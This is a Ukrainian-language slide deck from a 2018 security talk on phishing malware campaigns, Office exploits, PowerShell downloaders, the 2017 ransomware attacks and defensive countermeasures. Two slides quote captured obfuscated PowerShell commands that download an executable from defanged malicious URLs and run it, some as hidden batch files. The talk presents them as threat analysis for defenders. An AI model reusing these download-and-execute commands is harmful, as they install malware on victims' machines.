Vladyslav Radetsky, profile picture
Uploaded byVladyslav Radetsky
PDF, PPTX1,870 views

Невивчені уроки або логи антивірусних війн

Огляд технік актуальних масових атак із використанням фішингових розсилок. Механізми доставки шкідливого коду. Поширені типи приманок та способи їх знешкодження. Помилки, яких припускаються ІТ та ІБ фахівці при реагуванні на інциденти. Те, про що забувають. Скрипти, powershell, вразливості MS Office. Типові ознаки malware та робота з ними.

Embed presentation

Download as PDF, PPTX
Невивчені уроки або логи антивірусних війн 12 / 07 / 18 Владислав Радецький vr@optidata.com.ua
#whoami Лінивий параноїк-зануда. Працюю у компанії OptiData Аналізую віруси. Пишу статті. Проводжу навчання з різних аспектів ІБ Допомагаю з проектуванням, впровадженням та супроводом засобів захисту Прийшов до вас щоб поділитися досвідом vr@optidata.com.ua radetskiy.wordpress.com
OptiData – хто ми є ? Ми – це команда спеціалістів з практичним досвідом інтеграції та супроводу рішень з ІБ. Працюємо лише з тим, в чому розбираємось. Більшість здійснених нами проектів захищені NDA. Проектуємо. Навчаємо. Розгортаємо. Захищаємо.
OptiData – розсилки IOC
Важливо ! Усе про що я говоритиму – моя особиста точка зору Усе, що ви сьогодні почуєте може не співпадати із офіційною позицією компанії Усі події та персонажі є вигаданими, а будь-які співпадіння є випадковими Вибачте, етика, NDA etc…
04/18 020418 - Ursnif #doc_res #rtf #11882 030418 - quantloader #js #WSH 040418 - quantloader #URL #VBS 040418 - Dyreza #old_twitter_API 060418 - Lokibot #ace #scr | #ramnit #exe 110418 - HawkEye #doc_res #rtf #11882 250418 - netwireRAT #W97M/Downloader Поточна ситуація по атакам
05/18 030518 - Pony #doc17_0119 #HTA #power 100518 - Adwind #JAR #WSH 110518 - Lokibot #11882 #rtf 150518 - trojan #XLS #macro #powershell 250518 - Lokibot #zip #exe 250518 - FlawedAmmyy #power 300518 - Lokibot #doc_res #rtf #11882 300518 - Pony #rtf #11882 #gz #exe Поточна ситуація по атакам
Поточна ситуація по атакам 06/18 040618 - DZ-WORM #W97M/Downloader 070618 - FlawedAmmyy (RAT) #iqy #powershell 140618 - LokiBot #packed #iso #exe 150618 - Grandcrab #WSH #powershell 150618 - Trickbot #W97M/Downloader #power 180618 - IE exploit 18-8174 #VBS #HTA #powershell 190618 - Adwind #JAR #WSH | #pony #gz #exe 200618 - Adwind #JAR #WSH | #pony #r11 #exe 210618 - HawkEye #11882 #rtf 220618 - pony #r11 #exe 260618 - fake_putty #upx 270618 - ransom #RSAUtil #decrypt 270618 - trojan #doc_res #rtf #11882
Поточна ситуація по атакам 07/18 040718 - Trickbot #W97M/Downloader #powershell 050718 - HawkEye #xlam #powershell 100718 - Lokibot #rtf #11882 100718 - Lokibot #ACE #SCR 110718 - trojan #rar #exe … To be continued .
Поточна ситуація по атакам 04/18 - 07/18 Всього – > 50 різних зразків MS Office – 17 розсилок з них: із застосуванням powershell – 7 розсилок із застосуванням 11882 – 8 розсилок Java Backdoor – 3 розсилки
Аналіз Порівняння із 2017-им
• Раніше: • %tmp%fixed_name.exe • WSH (vb*, js*) - 70% розсилок Що змінилося ? 1 Приманка 2 Payload
• Тепер: • %Public%random_name.exe • %AppData%*random_name.exe • %ProgramData%random_name.exe • Powershell - 70% розсилок Що змінилося ? 1 Приманка 2 (Dropper) 3 Downl 4 Payload
Що змінилося ? 1 Приманка 2 (Dropper) 3 Downl 4 Payload • Тепер: • АВ сигнатури із затримкою • Сигнатури генерують по 1му та 2му кроку • Спрацювання АВ – лише частина атаки • Крок 3 – перевірка параметрів системи
• Раніше: • Розповсюдження – окремо, С2 - окремо • Приманки (80%) працювали лише добу Що змінилося ?
• Тепер: • Розповсюдження та С2 у 80% - 1 хост • Приманки спрацьовують через 5-7 днів (!) Що змінилося ?
• Раніше: • Payload – exe, не кодований • Web віддавали payload без зайвих умов Що змінилося ?
• Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ?
• Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ? 3 downloader 4 payload
• Тепер: • Payload – кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ?
• Раніше: • 1 точка • 1 та сама контрольна сума Що змінилося ?
Що змінилося ? • Тепер: • Мімікрія • Зміна контрольних сум (Zbot, Dyreza, Trickbot)
Powershell • Основний інструмент завантаження та запуску
Powershell • Основний інструмент завантаження та запуску
Powershell powershell $DuGgOVo = ‘yIqQkuk’;$a = ‘Msxml’ + ‘2.XML’ + ‘HTTP’;$avA3BE = ‘zjXOyL’;$b = ‘ADO’ + ‘DB.’ + ‘Stream’;$npo2cb = ‘AhLfy6’;$c = ‘G’ + ‘E’ + ‘T’;$xcVNsaFw = ‘tagBFRbq’;$d = 1 – 1 + 1;$nSQR1qd = ‘RhEGM’;$hr = New-Object - ComObject $a;$Tvcnch = ‘M7cerebf’;$ab = New-Object -ComObject $b;$oVDBm = ‘Y8DEr’;$path = $env:temp + ‘49552.exe’;$YlhPo = ‘zrEVSXdB’;$hr.open($c, ‘h11p:vivedoc{.} rudocument/pax.exe’, 0);$sHDPTRb5M = ‘TgRmj’;$hr.send();$MNhOwnbr = ‘xDJX0Z’;$ccUAdL = ‘JSsQEZQ’;$VR5pnoi = ‘piD7G6t’;$IY8gzg = ‘dZdYx’;$ab.open();$YODMbnR = ‘iIGrd’;$ab.type = $d;$ftUZAT = ‘uQk6v’;$ab.write($hr.responseBody);$MLKVm7Ki = ‘fQWbtv’;$ab.savetofile($path);$HyAX0Mlr = ‘tkvJU’;$ab.close();$NDnZ4YB = ‘NenMcXs’;$ayhTTR = ‘vtBgFL’;$bSBCCnkkL = ‘QaBQu’;$mLvCd5wn = ‘PkTPD’;$Wu3cZ0 = ‘nOP7DR’;$vJrAshn = ‘QvXmKwv’;$KfNmqt = ‘f9cKH3rw’;Start- Process $path;
Powershell 1st run cmd /c powershell "'powershell ""function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,''%tmp%xpvsvgw.exe'');start-process ''%tmp%xpvsvgw.exe'';}try{ysga(''h11p:icoindna{.}io/bri.ri'')}catch{ysga(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%dduuyd.bat; start-process '%tmp%dduuyd.bat' - windowstyle hidden" 2nd run cmd /c powershell "'powershell ""function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,''%tmp%nsxr.exe'');start-process ''%tmp%nsxr.exe'';}try{bxode(''h11p:icoindna{.} io/bri.ri'')}catch{bxode(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%ktph.bat; start-process '%tmp%ktph.bat' - windowstyle hidden" 3rd run cmd /c powershell "'powershell ""function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,''%tmp%bixi.exe'');start-process ''%tmp%bixi.exe'';}try{nnpsd(''h11p:icoindna{.} io/bri.ri'')}catch{nnpsd(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%wjqw.bat; start-process '%tmp%wjqw.bat' - windowstyle hidden"
Powershell
• Може комбінуватися з документами BITS
• Може комбінуватися з документами BITS
> Kafeine, malware.dontneed.coffee.com Web – exploits
> Kafeine, malware.dontneed.coffee.com Web – exploits
> radetskiy.wordpress.com Web – exploits
> radetskiy.wordpress.com Web – exploits
> Держ. архів Київської області Розповсюдження із скомпрометованих систем
> radetskiy.wordpress.com Розповсюдження із скомпрометованих систем
> radetskiy.wordpress.com Розповсюдження із скомпрометованих систем
Адекватні контрзаходи
Очищайте метадані (с) facebook > проект 6688
Очищайте метадані
Очищайте метадані
• Фільтр приєднань на рівні web/email - по заголовкам • Фільтр на рівні Web proxy - по User Agent - як на завантаження payload так і на зв’язок із С2 - • Пустий, test, bits, Mozilla 4.x etc – блок • В ідеалі – дозвіл лише актуальним IE, FF, Chrome • Аналіз SSL, заборона завантаження .ехе Перерізати канали доставки
• Фільтр по джерелу (web/email) .ua, .gov.ua etc – не довірені по замовчуванню • Взагалі, що стосується web трафіку – усе, що не довірене і не потрібне для роботи блок Перерізати канали доставки
• Execution Policy Bypass • Hidden PowerShell • PowerShell – WMI Script • PowerShell – Download • PowerShell – Encoded Command Powershell – контроль та блок
• Блок вихідного трафіку • Заборона запуску cmd, powershell, mshta (4User) • Заборона перехресного виклику • Заборона дочірніх процесів для MS Office • Заборона запису та зчитування небезпечних типів CMD, MSHTA, MS Office
MS Office OLE > PS
MS Office DDE > PS
MS Office 118882
MS Office Macro
• Зміст образів тестових ВМ • Адекватний час аналізу • Перевірка на інших збірках ОС та Office • Перевірка вручну • Перевірка на залізі Sandboxing
• Ізоляція на мережевому рівні • Затримка, оновлення в ручному режимі • Тестування оновлень Вимушене використання ПЗ (MEDoc та інші)
• aDS • ASD MS 17-010
• aDS • ASD MS 17-010
• aDS • ASD MS 17-010
#FuckResponsibleDisclosure
• Привілеї Адміністратора – не обов'язкові • Powershell, office, mshta • Повторне використання приманок • Зміна контрольних сум • Затримки при виконанні Поведінка при зараженні
• Для простих користувачів – пам'ятка на А4 • Для IT/IS – чітка послідовність процедур • Автономно без очікування команди зверху • Ізолювати, зібрати дані, перевстановити… Реагування на інциденти
Навчання користувачів - фішинг
Навчання користувачів - фішинг
Навчання користувачів - фішинг
Навчання користувачів - фішинг
Навчання користувачів - фішинг
Атаки 2017го року
Україна. Кібератаки 2017го року
Україна. Кібератаки 2017го року WannaCry 12-15 травень +C2, Mimikatz, SMB, +service, -MBR, -MFT, -signed, $300 - $600
Україна. Кібератаки 2017го року xData 17-18 травень -C2, Mimikatz, SMB, -MBR, -MFT, -signed, $100 - $600
Україна. Кібератаки 2017го року PetyaA 27 червень -C2, Mimikatz, SMB, +service, +MBR, +MFT, +signed, $300
Україна. Кібератаки 2017го року BadRabbit 24 жовтень -C2, Mimikatz, SMB, +service, +MBR, +MFT, +signed, $300
Україна. Кібератаки 2017го року
Україна. Кібератаки 2017го року WannaCry xData PetyaA BadRabbit травень травень червень жовтень
MS17-010 – був опублікований 14 / 03 / 17 Mimikatz – був опублікований десь у 2011 Зауважте:
• Не достатньо просто знати про вразливість • Не достатньо розуміти як саме працює вразливість • Не достатньо поставити виправлення і заспокоїтись Що нам це дає?
Що змінилося для нас? Україна. Кібератаки 2017го року
• Частина змирилася і дбає лише про бекапи • Інша частина колекціонує IOC • 15-20% - почали змінювати захист Україна. Кібератаки 2017го року
Хто з вас проводить розслідування по детекту ? * по кожному спрацюванню систем захисту А звідки ви впевнені що АВ не впіймав лише хвіст ? Реагування на інциденти
Три історії з практики
Історія #1 “Макрос”
Історія #1 “Макрос” - 24.05.18
Історія #1 “Макрос” - 14.03.18 • Хтось відкриває документ 2013го року • Спрацьовує макрос – пандемія (файли .doc) • Розслідування, розстріли • За 5 годин усі документи на х00 системах інжектовано • А якби це був #Pony або Ransom ? • …
Історія #1 “Макрос” - 14.03.18
Історія #1 “Макрос” - 14.03.18
Історія #2 “Впертий ransomware”
Історія #2 “Впертий ransomware”
Історія #2 “Впертий ransomware” • Жертва отримує фішинг із приманкою • Запускається ransomware • “Ааааа, ваш антивірус пропустив…” • Надаю людині маркери + контрзаходи • Рекурсія, рекурсія, (сумно, боляче) • Зашифровано систему керівника • “То шо ви там казали, який параметр поставити?”
Історія #3 “Страх або як роблять новини про ІБ”
Історія #3 “Страх або як роблять новини про ІБ”
Історія #3 “Страх або як роблять новини про ІБ” • Хтось “качає” щось .. ок, це був фейковий AdobeFlash • Зараження, виведення АРМ з ладу • Чутки поширюються зі швидкістю світла • В одному міністерстві вирішують вимкнути сервери • Журналіст намагається зайти на сайт міністерства • 502 = “Ааааа! Хакери поламали міністерство”
Висновки
Висновки #1 • Інструкції на випадок атаки • Автономне прийняття рішень та контрзаходів • Службові розслідування, форензика • Мінімізація втрат • Навчання персоналу
Висновки #2 • Оновлення/виправлення MS Office та Windows ! ! ! • Блок створення / запуску C:Users***.exe • Контроль/блок WSH, PowerShell, HTA, CMD, MS Office • Посилена фільтрація Web та Email • Відмова від RTF, макросів, JRE, Flash
Запитання ? #IOC та звіти шукайте тут: radetskiy.wordpress.com
• Twitter • https://twitter.com/malwrhunterteam • https://twitter.com/James_inthe_box • https://twitter.com/DissectMalware • https://twitter.com/Techhelplistcom • https://twitter.com/malware_traffic • Blogs & Media • https://embedi.com/blog/ • https://www.wired.com/category/threatlevel/ • https://arstechnica.com/information-technology/2018/ • https://threatpost.com/ • https://security.googleblog.com/ • https://www.schneier.com/ • https://krebsonsecurity.com/ • https://www.troyhunt.com/ Джерела інформації:
• VirtualBox • SysInternals Suite, PSTools • Nirsoft tools • oletools (python) • Wireshark, Fiddler • Pestudio, Explorer Suite, PE Explorer Інструменти:
Дякую вам за увагу!

More Related Content

PDF
Робота із malware. McAfee ATD+TIE+DXL/OpenDXL
byVladyslav Radetsky
 
PDF
Кіберзахист в умовах війни
byVladyslav Radetsky
 
PDF
"Мистецтво захисту бар'єрів"
byVladyslav Radetsky
 
PDF
NSP та MWG - захист мережевого трафіку
byVladyslav Radetsky
 
PDF
Як не стати жертвою ?
byVladyslav Radetsky
 
PDF
McAfee ENS 10.7 - що нового ?
byVladyslav Radetsky
 
PDF
McAfee – конструктор Lego для ІБ
byVladyslav Radetsky
 
PDF
Практичні рецепти захисту
byVladyslav Radetsky
 
Робота із malware. McAfee ATD+TIE+DXL/OpenDXL
byVladyslav Radetsky
 
Кіберзахист в умовах війни
byVladyslav Radetsky
 
"Мистецтво захисту бар'єрів"
byVladyslav Radetsky
 
NSP та MWG - захист мережевого трафіку
byVladyslav Radetsky
 
Як не стати жертвою ?
byVladyslav Radetsky
 
McAfee ENS 10.7 - що нового ?
byVladyslav Radetsky
 
McAfee – конструктор Lego для ІБ
byVladyslav Radetsky
 
Практичні рецепти захисту
byVladyslav Radetsky
 

What's hot

PDF
Penetration Testing Practice 2015
byVladyslav Radetsky
 
PPTX
9 клас урок 16
byЮлія Артюх
 
PDF
Check list: readiness for phishing attacks
byNETWAVE
 
PDF
Практики застосування рішень McAfee. Історії успіху.
byVladyslav Radetsky
 
PPTX
34
bymaksi100
 
PPTX
9 клас урок 15
byЮлія Артюх
 
PPTX
9 клас урок 17
byЮлія Артюх
 
PDF
Логи (анти)вірусних війн 2019-2020
byVladyslav Radetsky
 
DOCX
Less16
byNikolay Shaygorodskiy
 
Penetration Testing Practice 2015
byVladyslav Radetsky
 
9 клас урок 16
byЮлія Артюх
 
Check list: readiness for phishing attacks
byNETWAVE
 
Практики застосування рішень McAfee. Історії успіху.
byVladyslav Radetsky
 
34
bymaksi100
 
9 клас урок 15
byЮлія Артюх
 
9 клас урок 17
byЮлія Артюх
 
Логи (анти)вірусних війн 2019-2020
byVladyslav Radetsky
 
Less16
byNikolay Shaygorodskiy
 

Similar to Невивчені уроки або логи антивірусних війн

PDF
Сам собі sandbox або як перевіряти файли
byVladyslav Radetsky
 
PDF
Правила поведінки при роботі з ІТ 2017
byVladyslav Radetsky
 
PPT
Безпека в Інтернеті
byЮлія Артюх
 
PDF
Огляд сучасних кібератак та методів протидії
byAndriy Lysyuk
 
PPT
Програмне забезпечення ПК на службі офісного працівника
byOksana Kutsenko
 
PDF
комп'ютерні злочини
byHelen2015
 
PPTX
Безпека в інтернеті
byLida9
 
PPT
Комп'ютерні віруси та ативірусні програми. 9 клас
byЛюдмила Иваница
 
PPTX
Комп’ютерні ввіруси
byPasha Boyko
 
PPT
комп’ютерні віруси
byАндрій Юхимчук
 
PPT
віруси)
bydoippo123
 
DOCX
Less15
byNikolay Shaygorodskiy
 
PPTX
Кібер-Шмібер
byVlad Styran
 
PDF
Історії з практики. Боротьба із malware.
byVladyslav Radetsky
 
PDF
Атаки на критичну інфраструктуру України. Висновки. Рекомендації.
byVladyslav Radetsky
 
PDF
Безпека інтернет-ресурсів: АНАЛІЗ РОЗПОВСЮДЖЕНОСТІ ЗАГРОЗ ТА ТЕХНОЛОГІЇ ЗАХИСТУ
bySSCoding Group
 
PPT
Security
byjudin
 
PDF
Сучасні цільові атаки
byVladyslav Radetsky
 
PPTX
Safe in Internet
byNanafartis
 
PDF
Lekzia 1
byTamaraIvahnichenko
 
Сам собі sandbox або як перевіряти файли
byVladyslav Radetsky
 
Правила поведінки при роботі з ІТ 2017
byVladyslav Radetsky
 
Безпека в Інтернеті
byЮлія Артюх
 
Огляд сучасних кібератак та методів протидії
byAndriy Lysyuk
 
Програмне забезпечення ПК на службі офісного працівника
byOksana Kutsenko
 
комп'ютерні злочини
byHelen2015
 
Безпека в інтернеті
byLida9
 
Комп'ютерні віруси та ативірусні програми. 9 клас
byЛюдмила Иваница
 
Комп’ютерні ввіруси
byPasha Boyko
 
комп’ютерні віруси
byАндрій Юхимчук
 
віруси)
bydoippo123
 
Less15
byNikolay Shaygorodskiy
 
Кібер-Шмібер
byVlad Styran
 
Історії з практики. Боротьба із malware.
byVladyslav Radetsky
 
Атаки на критичну інфраструктуру України. Висновки. Рекомендації.
byVladyslav Radetsky
 
Безпека інтернет-ресурсів: АНАЛІЗ РОЗПОВСЮДЖЕНОСТІ ЗАГРОЗ ТА ТЕХНОЛОГІЇ ЗАХИСТУ
bySSCoding Group
 
Security
byjudin
 
Сучасні цільові атаки
byVladyslav Radetsky
 
Safe in Internet
byNanafartis
 
Lekzia 1
byTamaraIvahnichenko
 

More from Vladyslav Radetsky

PDF
Basic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threat
byVladyslav Radetsky
 
PDF
Intel Security Endpoint Protection 2015
byVladyslav Radetsky
 
PDF
Типові помилки при впровадженні DLP
byVladyslav Radetsky
 
PPTX
ShadyRAT: Anatomy of targeted attack
byVladyslav Radetsky
 
PDF
Безпека телефонів для ЗСУ, ТРО та волонтерів
byVladyslav Radetsky
 
PDF
Palo Alto Traps - тестирование на реальных семплах
byVladyslav Radetsky
 
PDF
Cybersecurity during real WAR [English version]
byVladyslav Radetsky
 
PDF
Типові помилки при впровадженні DLP #2
byVladyslav Radetsky
 
PDF
DLP 9.4 - новые возможности защиты от утечек
byVladyslav Radetsky
 
PDF
Защита данных безнеса с помощью шифрования
byVladyslav Radetsky
 
PDF
7 кроків у напрямку безпеки
byVladyslav Radetsky
 
PDF
McAfee Endpoint Security 10.1
byVladyslav Radetsky
 
PDF
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
byVladyslav Radetsky
 
PDF
2й фактор для телефону
byVladyslav Radetsky
 
Basic detection tests of McAfee ENS + MVISION Insights usage for SunBurst threat
byVladyslav Radetsky
 
Intel Security Endpoint Protection 2015
byVladyslav Radetsky
 
Типові помилки при впровадженні DLP
byVladyslav Radetsky
 
ShadyRAT: Anatomy of targeted attack
byVladyslav Radetsky
 
Безпека телефонів для ЗСУ, ТРО та волонтерів
byVladyslav Radetsky
 
Palo Alto Traps - тестирование на реальных семплах
byVladyslav Radetsky
 
Cybersecurity during real WAR [English version]
byVladyslav Radetsky
 
Типові помилки при впровадженні DLP #2
byVladyslav Radetsky
 
DLP 9.4 - новые возможности защиты от утечек
byVladyslav Radetsky
 
Защита данных безнеса с помощью шифрования
byVladyslav Radetsky
 
7 кроків у напрямку безпеки
byVladyslav Radetsky
 
McAfee Endpoint Security 10.1
byVladyslav Radetsky
 
Перевірка роботи McAfee ENS. MVISION Insights SUNBURST.
byVladyslav Radetsky
 
2й фактор для телефону
byVladyslav Radetsky
 

Невивчені уроки або логи антивірусних війн

  • 1.
    Невивчені уроки або логиантивірусних війн 12 / 07 / 18 Владислав Радецький vr@optidata.com.ua
  • 2.
    #whoami Лінивий параноїк-зануда. Працюю укомпанії OptiData Аналізую віруси. Пишу статті. Проводжу навчання з різних аспектів ІБ Допомагаю з проектуванням, впровадженням та супроводом засобів захисту Прийшов до вас щоб поділитися досвідом vr@optidata.com.ua radetskiy.wordpress.com
  • 3.
    OptiData – хтоми є ? Ми – це команда спеціалістів з практичним досвідом інтеграції та супроводу рішень з ІБ. Працюємо лише з тим, в чому розбираємось. Більшість здійснених нами проектів захищені NDA. Проектуємо. Навчаємо. Розгортаємо. Захищаємо.
  • 4.
  • 5.
    Важливо ! Усе прощо я говоритиму – моя особиста точка зору Усе, що ви сьогодні почуєте може не співпадати із офіційною позицією компанії Усі події та персонажі є вигаданими, а будь-які співпадіння є випадковими Вибачте, етика, NDA etc…
  • 6.
    04/18 020418 - Ursnif#doc_res #rtf #11882 030418 - quantloader #js #WSH 040418 - quantloader #URL #VBS 040418 - Dyreza #old_twitter_API 060418 - Lokibot #ace #scr | #ramnit #exe 110418 - HawkEye #doc_res #rtf #11882 250418 - netwireRAT #W97M/Downloader Поточна ситуація по атакам
  • 7.
    05/18 030518 - Pony#doc17_0119 #HTA #power 100518 - Adwind #JAR #WSH 110518 - Lokibot #11882 #rtf 150518 - trojan #XLS #macro #powershell 250518 - Lokibot #zip #exe 250518 - FlawedAmmyy #power 300518 - Lokibot #doc_res #rtf #11882 300518 - Pony #rtf #11882 #gz #exe Поточна ситуація по атакам
  • 8.
    Поточна ситуація поатакам 06/18 040618 - DZ-WORM #W97M/Downloader 070618 - FlawedAmmyy (RAT) #iqy #powershell 140618 - LokiBot #packed #iso #exe 150618 - Grandcrab #WSH #powershell 150618 - Trickbot #W97M/Downloader #power 180618 - IE exploit 18-8174 #VBS #HTA #powershell 190618 - Adwind #JAR #WSH | #pony #gz #exe 200618 - Adwind #JAR #WSH | #pony #r11 #exe 210618 - HawkEye #11882 #rtf 220618 - pony #r11 #exe 260618 - fake_putty #upx 270618 - ransom #RSAUtil #decrypt 270618 - trojan #doc_res #rtf #11882
  • 9.
    Поточна ситуація поатакам 07/18 040718 - Trickbot #W97M/Downloader #powershell 050718 - HawkEye #xlam #powershell 100718 - Lokibot #rtf #11882 100718 - Lokibot #ACE #SCR 110718 - trojan #rar #exe … To be continued .
  • 10.
    Поточна ситуація поатакам 04/18 - 07/18 Всього – > 50 різних зразків MS Office – 17 розсилок з них: із застосуванням powershell – 7 розсилок із застосуванням 11882 – 8 розсилок Java Backdoor – 3 розсилки
  • 11.
  • 12.
    • Раніше: • %tmp%fixed_name.exe •WSH (vb*, js*) - 70% розсилок Що змінилося ? 1 Приманка 2 Payload
  • 13.
    • Тепер: • %Public%random_name.exe •%AppData%*random_name.exe • %ProgramData%random_name.exe • Powershell - 70% розсилок Що змінилося ? 1 Приманка 2 (Dropper) 3 Downl 4 Payload
  • 14.
    Що змінилося ? 1Приманка 2 (Dropper) 3 Downl 4 Payload • Тепер: • АВ сигнатури із затримкою • Сигнатури генерують по 1му та 2му кроку • Спрацювання АВ – лише частина атаки • Крок 3 – перевірка параметрів системи
  • 15.
    • Раніше: • Розповсюдження– окремо, С2 - окремо • Приманки (80%) працювали лише добу Що змінилося ?
  • 16.
    • Тепер: • Розповсюдженнята С2 у 80% - 1 хост • Приманки спрацьовують через 5-7 днів (!) Що змінилося ?
  • 17.
    • Раніше: • Payload– exe, не кодований • Web віддавали payload без зайвих умов Що змінилося ?
  • 18.
    • Тепер: • Payload– кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ?
  • 19.
    • Тепер: • Payload– кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ? 3 downloader 4 payload
  • 20.
    • Тепер: • Payload– кодований/перепакований • Web віддають payload лише по UA або SSL Що змінилося ?
  • 21.
    • Раніше: • 1точка • 1 та сама контрольна сума Що змінилося ?
  • 22.
    Що змінилося ? •Тепер: • Мімікрія • Зміна контрольних сум (Zbot, Dyreza, Trickbot)
  • 23.
    Powershell • Основний інструментзавантаження та запуску
  • 24.
    Powershell • Основний інструментзавантаження та запуску
  • 25.
    Powershell powershell $DuGgOVo =‘yIqQkuk’;$a = ‘Msxml’ + ‘2.XML’ + ‘HTTP’;$avA3BE = ‘zjXOyL’;$b = ‘ADO’ + ‘DB.’ + ‘Stream’;$npo2cb = ‘AhLfy6’;$c = ‘G’ + ‘E’ + ‘T’;$xcVNsaFw = ‘tagBFRbq’;$d = 1 – 1 + 1;$nSQR1qd = ‘RhEGM’;$hr = New-Object - ComObject $a;$Tvcnch = ‘M7cerebf’;$ab = New-Object -ComObject $b;$oVDBm = ‘Y8DEr’;$path = $env:temp + ‘49552.exe’;$YlhPo = ‘zrEVSXdB’;$hr.open($c, ‘h11p:vivedoc{.} rudocument/pax.exe’, 0);$sHDPTRb5M = ‘TgRmj’;$hr.send();$MNhOwnbr = ‘xDJX0Z’;$ccUAdL = ‘JSsQEZQ’;$VR5pnoi = ‘piD7G6t’;$IY8gzg = ‘dZdYx’;$ab.open();$YODMbnR = ‘iIGrd’;$ab.type = $d;$ftUZAT = ‘uQk6v’;$ab.write($hr.responseBody);$MLKVm7Ki = ‘fQWbtv’;$ab.savetofile($path);$HyAX0Mlr = ‘tkvJU’;$ab.close();$NDnZ4YB = ‘NenMcXs’;$ayhTTR = ‘vtBgFL’;$bSBCCnkkL = ‘QaBQu’;$mLvCd5wn = ‘PkTPD’;$Wu3cZ0 = ‘nOP7DR’;$vJrAshn = ‘QvXmKwv’;$KfNmqt = ‘f9cKH3rw’;Start- Process $path;
  • 26.
    Powershell 1st run cmd /cpowershell "'powershell ""function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,''%tmp%xpvsvgw.exe'');start-process ''%tmp%xpvsvgw.exe'';}try{ysga(''h11p:icoindna{.}io/bri.ri'')}catch{ysga(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%dduuyd.bat; start-process '%tmp%dduuyd.bat' - windowstyle hidden" 2nd run cmd /c powershell "'powershell ""function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,''%tmp%nsxr.exe'');start-process ''%tmp%nsxr.exe'';}try{bxode(''h11p:icoindna{.} io/bri.ri'')}catch{bxode(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%ktph.bat; start-process '%tmp%ktph.bat' - windowstyle hidden" 3rd run cmd /c powershell "'powershell ""function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,''%tmp%bixi.exe'');start-process ''%tmp%bixi.exe'';}try{nnpsd(''h11p:icoindna{.} io/bri.ri'')}catch{nnpsd(''h11p:meanmuscles{.} com/bri.ri'')}'"" | out-file -encoding ascii -filepath %tmp%wjqw.bat; start-process '%tmp%wjqw.bat' - windowstyle hidden"
  • 27.
  • 28.
    • Може комбінуватисяз документами BITS
  • 29.
    • Може комбінуватисяз документами BITS
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
    > Держ. архівКиївської області Розповсюдження із скомпрометованих систем
  • 35.
    > radetskiy.wordpress.com Розповсюдження ізскомпрометованих систем
  • 36.
    > radetskiy.wordpress.com Розповсюдження ізскомпрометованих систем
  • 37.
  • 38.
  • 39.
  • 40.
  • 41.
    • Фільтр приєднаньна рівні web/email - по заголовкам • Фільтр на рівні Web proxy - по User Agent - як на завантаження payload так і на зв’язок із С2 - • Пустий, test, bits, Mozilla 4.x etc – блок • В ідеалі – дозвіл лише актуальним IE, FF, Chrome • Аналіз SSL, заборона завантаження .ехе Перерізати канали доставки
  • 42.
    • Фільтр поджерелу (web/email) .ua, .gov.ua etc – не довірені по замовчуванню • Взагалі, що стосується web трафіку – усе, що не довірене і не потрібне для роботи блок Перерізати канали доставки
  • 43.
    • Execution PolicyBypass • Hidden PowerShell • PowerShell – WMI Script • PowerShell – Download • PowerShell – Encoded Command Powershell – контроль та блок
  • 44.
    • Блок вихідноготрафіку • Заборона запуску cmd, powershell, mshta (4User) • Заборона перехресного виклику • Заборона дочірніх процесів для MS Office • Заборона запису та зчитування небезпечних типів CMD, MSHTA, MS Office
  • 45.
  • 46.
  • 47.
  • 48.
  • 49.
    • Зміст образівтестових ВМ • Адекватний час аналізу • Перевірка на інших збірках ОС та Office • Перевірка вручну • Перевірка на залізі Sandboxing
  • 50.
    • Ізоляція намережевому рівні • Затримка, оновлення в ручному режимі • Тестування оновлень Вимушене використання ПЗ (MEDoc та інші)
  • 51.
  • 52.
  • 53.
  • 54.
  • 55.
    • Привілеї Адміністратора– не обов'язкові • Powershell, office, mshta • Повторне використання приманок • Зміна контрольних сум • Затримки при виконанні Поведінка при зараженні
  • 56.
    • Для простихкористувачів – пам'ятка на А4 • Для IT/IS – чітка послідовність процедур • Автономно без очікування команди зверху • Ізолювати, зібрати дані, перевстановити… Реагування на інциденти
  • 57.
  • 58.
  • 59.
  • 60.
  • 61.
  • 62.
  • 63.
  • 64.
    Україна. Кібератаки 2017гороку WannaCry 12-15 травень +C2, Mimikatz, SMB, +service, -MBR, -MFT, -signed, $300 - $600
  • 65.
    Україна. Кібератаки 2017гороку xData 17-18 травень -C2, Mimikatz, SMB, -MBR, -MFT, -signed, $100 - $600
  • 66.
    Україна. Кібератаки 2017гороку PetyaA 27 червень -C2, Mimikatz, SMB, +service, +MBR, +MFT, +signed, $300
  • 67.
    Україна. Кібератаки 2017гороку BadRabbit 24 жовтень -C2, Mimikatz, SMB, +service, +MBR, +MFT, +signed, $300
  • 68.
  • 69.
    Україна. Кібератаки 2017гороку WannaCry xData PetyaA BadRabbit травень травень червень жовтень
  • 70.
    MS17-010 – бувопублікований 14 / 03 / 17 Mimikatz – був опублікований десь у 2011 Зауважте:
  • 71.
    • Не достатньопросто знати про вразливість • Не достатньо розуміти як саме працює вразливість • Не достатньо поставити виправлення і заспокоїтись Що нам це дає?
  • 72.
    Що змінилося длянас? Україна. Кібератаки 2017го року
  • 73.
    • Частина змириласяі дбає лише про бекапи • Інша частина колекціонує IOC • 15-20% - почали змінювати захист Україна. Кібератаки 2017го року
  • 74.
